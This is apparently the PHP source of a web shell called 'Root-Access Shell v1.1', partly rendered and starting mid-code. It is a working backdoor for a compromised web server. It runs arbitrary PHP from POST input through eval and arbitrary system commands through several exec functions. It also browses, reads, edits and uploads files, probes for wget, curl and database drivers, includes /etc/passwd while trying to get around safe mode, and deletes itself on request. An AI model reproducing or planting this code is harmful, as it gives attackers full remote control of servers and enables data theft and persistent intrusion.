Root-Access Shell

ON";}else{return "OFF";} }function view_size($size){ if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size;} function testfetch() {if(ex('fetch --help')) {return "ON";}else{return "OFF";} }function testwget(){ if(ex('wget --help')){return "ON";}else{return "OFF";} }function oracle(){ if(function_exists('ocilogon')){return "ON";}else{return "OFF";} }function postgresql(){ if(function_exists('pg_connect')){return "ON";}else{return "OFF";} }function testmssql(){if(function_exists('mssql_connect')){return "ON";}else{return "OFF";} }function testcurl(){ if(function_exists('curl_version')){return "ON";}else{return "OFF";} }function testmysql(){ if(function_exists('mysql_connect')){return "ON";}else{return "OFF";} }function safe_mode(){ if(!$safe_mode && strpos(ex("echo abch0ld"),"h0ld")!=3){$_SESSION['safe_mode'] = 1;return "ON";}else{ $_SESSION['safe_mode'] = 0;return "OFF";} };function ex($in){ $out = ''; if(function_exists('exec')){exec($in,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($in);$out = ob_get_contents();ob_end_clean();} elseif(function_exists('system')){ob_start();system($in);$out = ob_get_contents();ob_end_clean();} elseif(function_exists('shell_exec')){$out = shell_exec($in);} elseif(is_resource($f = popen($in,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);} pclose($f);} return $out;} function shell() {if($_POST['type']==1){eval(stripslashes($_POST['value']));}elseif($_POST['type']==2){pwd();print_r(ex(stripslashes($_POST['value'])));} elseif($_POST['type']==3){if($_SESSION['safe_mode'] == 1){if(($u=safe_ex('ls -la'))!='') {return $u;}else{return safe_ex('dir');};}else{if(($u=ex('ls -la'))!=''){return $u;}else{return ex('dir');};}} elseif($_POST['type']==4){ if(file_exists(stripslashes($_POST['value']))){ if($safe_mode!=1){echo htmlspecialchars(fread(fopen(stripslashes($_POST['value']),"rw"),filesize(stripslashes($_POST['value'])))); }else{echo htmlspecialchars(safe_read(stripslashes($_POST['value'])));}; $_SESSION['edit']=1; $_SESSION['filename'] = $_POST['value'];}else{return 'File doesn\'t exists!';}} elseif($_POST['type']==5){fputs(fopen($_SESSION['filename'],"w"),stripslashes($_POST['value']));} elseif($_POST['type']==6){$uploaddir = pwd();if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);} else{$u = ex('ls -la');if($u == ''){return ex('dir');}else{return $u;};} return null;}; function edit() {if ($_SESSION['edit'] == 1){$_SESSION['edit']=0;return "
";};} function getsystem() {return php_uname('s')." ".php_uname('r')." ".php_uname('v');}; function getserver() {return getenv("SERVER_SOFTWARE");}; function getuser() {$out = get_current_user(); if($out!="SYSTEM"){if(($out=ex('id'))==''){$out = "uid=".getmyuid()."(".get_current_user().") gid=".getmygid();};} return $out;}; function pwd() {if($_POST['type']==3){$_SESSION['pwd'] = stripslashes($_POST['value']);} chdir($_SESSION['pwd']); $cwd = getcwd(); if($u=strrpos($cwd,'/')) {if($u!=strlen($cwd)-1){return $cwd.'/';}else{return $cwd;};} elseif($u=strrpos($cwd,'\\')) {if($u!=strlen($cwd)-1){return $cwd.'\\';}else{return $cwd;};}; }function safe_ex($in){ if($in){$d=dir('.'); while (false!==($file=$d->read())){ if ($file=="." || $file=="..") continue; @clearstatcache(); list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); if(!$unix){ echo date("d.m.Y H:i",$mtime)." "; if(@is_dir($file)) echo " "; else printf("% 7s ",$size); }else{$owner = @posix_getpwuid($uid); $grgid = @posix_getgrgid($gid); echo $inode." "; echo perms(@fileperms($file)); printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); echo date("d.m.Y H:i ",$mtime);} echo "$file\n";} $d->close();} function safe_read($in) {echo ini_get("safe_mode"); echo ini_get("open_basedir"); include("/etc/passwd"); ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); file_get_contents($in);} }if($_GET['kill']=='done'){ unlink($_SERVER['SCRIPT_FILENAME']); echo "";}?> Root-Access Shell

Server Info

System:	PHP-version:	Oracle:	Safe_mode:
Server:	MySQL:	cURL:	Total space:
PWD: 45){echo "...".substr($u,strlen($u)-40,40);}else{echo $u;};?>	PostgreSQL:	WGet:	Free space:
User:	MSSQL:	Perl:	Server time:

Shell [Kill Shell]

Tools

Edit file: >	Download:>
Run PHP Code: <?php echo 'echo "Root-Access Shell";';?>	Upload: New name:

Copyright
Root-Access Shell v1.1